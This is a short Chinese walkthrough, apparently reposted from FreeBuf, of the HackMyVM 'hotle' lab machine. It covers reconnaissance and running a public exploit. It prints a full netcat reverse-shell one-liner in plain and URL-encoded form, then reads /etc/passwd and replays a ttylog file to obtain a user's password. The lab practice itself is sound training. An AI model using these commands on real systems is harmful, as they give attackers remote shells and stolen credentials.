hackmyvm系列1——hotle
2022-3-25 19:55:30 Author: www.freebuf.com(查看原文) 阅读量:10 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

前言:

hackmyvm打靶系列文章。

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

所有环境均为在线下载的靶场,且在本机进行学习。

一、信息收集

netdiscover -r 192.168.56.0/24

nmap -sV -Pn -sC 192.168.56.123

直接搜一下是否存在漏洞,直接exp执行。

生成了一个后门的文件,直接访问反弹shell即可。

二、反弹shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.56.105 6666 >/tmp/f

需要先进行一下url编码。

rm%20%2ftmp%2ff%3bmkfifo%20%2ftmp%2ff%3bcat%20%2ftmp%2ff%7cbash%20-i%202%3e%261%7cnc%20192.168.56.105%206666%20%3e%2ftmp%2ff。

三、懵逼的提权

cat /etc/passwd。

发现一个person的用户。

后门的提权看了一下wp。。。get到一个新东西ttylog,自己是真不知道这是啥,感觉有点像ctf了

ttyplay /var/www/html/ttylog。

运行即可得到person的密码,简直有趣。。。

读者自己尝试。


文章来源: https://www.freebuf.com/articles/database/326355.html
如有侵权请联系:admin#unsafe.sh